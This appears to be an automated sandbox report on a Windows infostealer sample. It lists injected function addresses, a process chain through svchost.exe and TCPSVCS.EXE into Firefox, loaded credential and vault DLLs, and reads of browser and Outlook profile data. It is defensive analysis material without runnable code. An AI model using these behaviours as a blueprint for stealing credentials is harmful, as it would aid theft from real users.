                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DC0100
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E6A118
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DEC6E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DCC7C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DF4750
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD0770
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E7E4F6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E82446
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E74420
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E90591
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD0535
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DCEA80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E86BD7
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8AB40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DFE8F0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DB68B8
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DDA840
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD2840
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E9A9A6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD29A0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DE6962
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8EEDB
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DE2E90
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8CE93
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD0E59
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8EE26
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DC2FC8
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DDCFE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E4EFA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E44F40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E12F28
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E72F30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DF0F30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DC0CF2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E70CB5
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD0C00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DCADE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DE8DBF
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DDAD00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E6CD1F
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E712ED
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DEB2C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD52A0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E1739A
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DBD34C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8132D
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E870E9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8F0E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD70C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E7F0CC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DDB1B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E9B16B
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E0516C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DBF172
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E816CC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E15630
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8F7B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DC1460
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8F43F
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E995C3
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E6D5B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E87571
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E7DAC6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E15AA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E71AA3
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E6DAAC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E43A6C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8FA49
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E87A46
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E45BF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E0DBF9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DEFB80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8FB76
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD38E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E3D800
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD9950
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DEB950
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E65910
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD9EB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD1F92
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8FFB1
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8FF09
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8FCF2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E49C32
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DEFDC0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E87D73
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DD3D40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E81D5A
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_00141C30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_0013CB18
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_0013CB20
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_0013AD30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_0013CD40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_0013AE74
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0013AE805_2_0013AE80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0013AEC95_2_0013AEC9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_001452D05_2_001452D0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_001434D05_2_001434D0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_001434CB5_2_001434CB
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0015B8F05_2_0015B8F0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3E2175_2_02A3E217
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3E3385_2_02A3E338
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3D7985_2_02A3D798
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3CA245_2_02A3CA24
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03AAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03A2B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03A87E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03ABF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03A75130 appears 58 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: String function: 02E3EA12 appears 86 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: String function: 02E05130 appears 58 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: String function: 02E17E54 appears 111 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: String function: 02DBB970 appears 280 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: String function: 02E4F290 appears 105 times
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: String function: 005EF9F2 appears 40 times
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: String function: 005F0A30 appears 46 times
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: String function: 005D9CB3 appears 31 times
                Source: ofZiNLLKZU.exe, 00000000.00000003.1469453905.00000000044FD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ofZiNLLKZU.exe
                Source: ofZiNLLKZU.exe, 00000000.00000003.1468456820.0000000004353000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ofZiNLLKZU.exe
                Source: ofZiNLLKZU.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@12/9
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_006437B5 GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_006310BF AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_006316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_006451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_0065A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_0064648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_005D42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | File created: C:\Users\user\AppData\Local\Temp\aut1E9C.tmp
                Source: ofZiNLLKZU.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: TCPSVCS.EXE, 00000005.00000003.1944069759.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3901472005.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1949608269.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3901472005.00000000029F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ofZiNLLKZU.exe | ReversingLabs: Detection: 71%
                Source: ofZiNLLKZU.exe | Virustotal: Detection: 63%
                Source: unknown | Process created: C:\Users\user\Desktop\ofZiNLLKZU.exe "C:\Users\user\Desktop\ofZiNLLKZU.exe"
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ofZiNLLKZU.exe"
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe | Process created: C:\Windows\SysWOW64\TCPSVCS.EXE "C:\Windows\SysWOW64\TCPSVCS.EXE"
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: ofZiNLLKZU.exe | Static file information: File size 1265664 > 1048576
                Source: ofZiNLLKZU.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: ofZiNLLKZU.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: ofZiNLLKZU.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: ofZiNLLKZU.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: ofZiNLLKZU.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: ofZiNLLKZU.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: ofZiNLLKZU.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kwRriiLHUBrBci.exe, 00000004.00000000.1649615978.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3901520973.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: tcpsvcs.pdb source: svchost.exe, 00000002.00000002.1724812110.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1724832326.0000000003419000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000002.3901858595.00000000011F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: ofZiNLLKZU.exe, 00000000.00000003.1469038051.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, ofZiNLLKZU.exe, 00000000.00000003.1469321830.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1725013756.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631822493.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1725013756.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1634122122.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1733003982.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1735628342.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ofZiNLLKZU.exe, 00000000.00000003.1469038051.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, ofZiNLLKZU.exe, 00000000.00000003.1469321830.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1725013756.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631822493.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1725013756.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1634122122.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, TCPSVCS.EXE, 00000005.00000003.1733003982.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1735628342.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tcpsvcs.pdbGCTL source: svchost.exe, 00000002.00000002.1724812110.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1724832326.0000000003419000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000002.3901858595.00000000011F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: TCPSVCS.EXE, 00000005.00000002.3904938820.00000000033BC000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3901472005.000000000293D000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2061663725.00000000061EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: TCPSVCS.EXE, 00000005.00000002.3904938820.00000000033BC000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3901472005.000000000293D000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2061663725.00000000061EC000.00000004.80000000.00040000.00000000.sdmp
                Source: ofZiNLLKZU.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: ofZiNLLKZU.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: ofZiNLLKZU.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: ofZiNLLKZU.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: ofZiNLLKZU.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_005D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_005F0A76 push ecx; ret 0_2_005F0A89
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_01A67B28 push ss; retf 0_2_01A67CC2
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_01A67CC3 push ss; retn 006Fh 0_2_01A67D0A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004122D5 pushad ; ret 2_2_004122FD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D286 pushad ; ret 2_2_0040D29D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004032B0 push eax; ret 2_2_004032B2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00408306 push ds; retf 2_2_00408307
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00404D95 push edx; retf 2_2_00404D96
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418FFD push esi; iretd 2_2_00418FFE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004177A9 push ds; retf 80F3h 2_2_004177B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0225F pushad ; ret 2_2_03A027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A027FA pushad ; ret 2_2_03A027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx 2_2_03A309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0283D push eax; iretd 2_2_03A02858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A01366 push eax; iretd 2_2_03A01369
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02D9225F pushad ; ret 5_2_02D927F9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02D927FA pushad ; ret 5_2_02D927F9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02D9283D push eax; iretd 5_2_02D92858
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02DC09AD push ecx; mov dword ptr [esp], ecx 5_2_02DC09B6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_001423FB pushfd ; iretd 5_2_001423FC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_001444F6 push ds; retf 80F3h 5_2_00144500
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_001505E4 push ss; retf 5_2_001505E8
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_0013F022 pushad ; ret 5_2_0013F04A
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00135053 push ds; retf 5_2_00135054
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_0014B736 push edx; retf 5_2_0014B737
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_0014D868 push ebp; ret 5_2_0014D86D
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00131AE2 push edx; retf 5_2_00131AE3
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00145D4A push esi; iretd 5_2_00145D4B
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02A3B4CC push ebp; ret 5_2_02A3B4D4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02A395C2 push ecx; iretd 5_2_02A395C7
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02A32E0D push es; iretd 5_2_02A32E14
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_005EF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
